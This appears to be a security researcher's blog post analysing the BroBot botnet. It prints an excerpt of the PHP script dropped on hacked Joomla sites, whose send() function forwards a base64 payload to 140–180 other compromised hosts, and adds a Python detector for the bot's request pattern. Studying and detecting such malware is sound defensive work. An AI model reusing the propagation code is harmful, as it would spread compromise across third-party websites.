03.22
In the last few days the BroBot runners have started a new wave: they send POST requests carrying a c_id parameter to the hacked sites.
The base64-encoded payload in those requests decodes to the following script (excerpt):
On every POST request it receives, the script in turn contacts 140 to 180 other hacked URLs:
....
function send($target){
    forkill();   // defined elsewhere in the dropped script (not in this excerpt)
    // Target is this host itself: reuse the global $code; any other host: forward the c_id we were called with
    if(strpos($target,$_SERVER["SERVER_NAME"]) !== false){
        global $code;
    } else{
        $code = $_REQUEST["c_id"];
    }
    if(!preg_match("/http/i",$target))
        $target = "http://$target";
    $parts = @parse_url($target);
    $host = $parts["host"];
    $path = $parts["path"];
    if($path=="")$path="/";
    // c_id, fr and ksess are passed on unchanged; 'gnu[]' is always sent with the literal value 'base64_decode'
    $data = @http_build_query(array("c_id" => $code ,'gnu[]' => 'base64_decode', "fr" => $_REQUEST["fr"], "ksess" => $_REQUEST["ksess"]));
    // Raw HTTP/1.1 POST built by hand and written straight to the socket (no curl, no file_get_contents)
    $request = "POST $path HTTP/1.1\r\n"
    ."Host: $host\r\n"
    ."User-Agent: Mozilla/5.0 Firefox/3.6.12\r\n"
    ."Accept: */*\r\n"
    ."Accept-Language: en-us,en;q=0.5\r\n"
    ."Accept-Encoding: deflate\r\n"
    ."Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
    ."Content-type: application/x-www-form-urlencoded\r\n"
    ."Content-Length: ".strlen($data)."\r\n"
    ."Connection: Close\r\n"
    ."Cache-Control: no-cache\r\n\r\n{$data}";
    forkill();
    // Fire and forget: open the socket, write the request, switch to non-blocking and return without reading the reply
    $fp = @fsockopen($host, 80);
    @stream_set_timeout($fp, 3000);
    @fwrite($fp, $request);
    @stream_set_blocking($fp, 0);
    return $fp;
}
// rf=1 or fr=1: echo the contents of a result file in the writable directory, then unlink a file with a
// different name (the two names differ in the sample as captured) and flush the output
if((isset($_REQUEST["rf"]) && $_REQUEST["rf"] == 1) || $_REQUEST["fr"] == 1){
    echo @implode("", @file(writabledir()."/res"."2eb7e37x28e"));
    @unlink(writabledir()."/res"."2ebx839d1fb28e");
    flush();
}
$fn = lock();   // also defined elsewhere in the script
....
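The request that send() writes to the socket has a fixed shape: a POST with the short User-Agent "Mozilla/5.0 Firefox/3.6.12", "Accept-Encoding: deflate", "Connection: Close", and a form body that always carries gnu[]=base64_decode next to c_id and ksess. The following is an added example (our own detection code, not part of the bot script or of the captured sample): it parses a raw request as an IDS tap or a PHP auto_prepend hook would see it and scores it against those indicators. The host name, the c_id and ksess values and the benign comparison request are constructed for the example.

```python
"""Flag POST requests shaped like the BroBot fan-out request built by send().

Added example for this write-up; not the bot's code.  The sample requests
below are constructed, the host 'example.invalid' and the parameter values
are made up.
"""
from urllib.parse import parse_qs, urlencode

# Indicators taken from the send() function quoted above.
BROBOT_UA = "Mozilla/5.0 Firefox/3.6.12"
BROBOT_MARKER = ("gnu[]", "base64_decode")


def build_like_send(host: str, path: str, params: dict) -> str:
    """Rebuild the exact byte layout send() produces, for testing a detector
    offline.  Header order and values mirror the PHP string concatenation."""
    body = urlencode(params)  # same encoding as PHP http_build_query (gnu[] -> gnu%5B%5D)
    return (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"User-Agent: {BROBOT_UA}\r\n"
        "Accept: */*\r\n"
        "Accept-Language: en-us,en;q=0.5\r\n"
        "Accept-Encoding: deflate\r\n"
        "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
        "Content-type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: Close\r\n"
        "Cache-Control: no-cache\r\n\r\n"
        f"{body}"
    )


# Constructed sample: what a victim would receive from one infected peer.
SAMPLE_REQUEST = build_like_send(
    "example.invalid", "/index.php",
    {"c_id": "deadbeef", "gnu[]": "base64_decode", "fr": "1", "ksess": "abc123"},
)

# Constructed benign comparison: an ordinary browser form post.
BENIGN_REQUEST = (
    "POST /index.php?option=com_users HTTP/1.1\r\n"
    "Host: example.invalid\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 28\r\n"
    "Connection: keep-alive\r\n\r\n"
    "username=alice&passwd=secret"
)


def parse_raw_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into request line, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body}


def brobot_indicators(req: dict) -> list:
    """Return the indicators matched by a parsed request; [] means no match."""
    hits = []
    if req["method"] != "POST":
        return hits
    params = parse_qs(req["body"], keep_blank_values=True)
    key, value = BROBOT_MARKER
    if params.get(key) == [value]:        # the constant 'gnu[]' => 'base64_decode'
        hits.append("gnu[]=base64_decode")
    if "c_id" in params and "ksess" in params:
        hits.append("c_id+ksess")
    h = req["headers"]
    if h.get("user-agent") == BROBOT_UA:   # bare UA without the usual platform token
        hits.append("user-agent")
    if h.get("accept-encoding") == "deflate" and h.get("connection", "").lower() == "close":
        hits.append("deflate+close")
    return hits


def is_brobot(raw: str, min_hits: int = 2) -> bool:
    """True when at least min_hits independent indicators match.  Requiring two
    keeps a lone UA or header quirk from triggering on ordinary traffic."""
    return len(brobot_indicators(parse_raw_request(raw))) >= min_hits


if __name__ == "__main__":
    for label, raw in (("sample", SAMPLE_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, brobot_indicators(parse_raw_request(raw)), is_brobot(raw))
```

The body indicator is the strongest one: the literal gnu[]=base64_decode pair is hard-coded in send(), while the User-Agent and the deflate/Close header pair could change in the next version of the script, so the detector treats them as supporting evidence only and requires two hits before flagging a request.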
So far we have found 3357 URLs of hacked Joomla sites and other sites.
Over 2,500 of the scripts/URLs are still online. In the next few days we will report the sites to Bank of America or directly to the hosters so that they can check and clean them up.
We will also analyse the complete PHP code in the coming days and write a bit about what is bad in it and what could be done better 🙂
If you want the complete code, please contact us.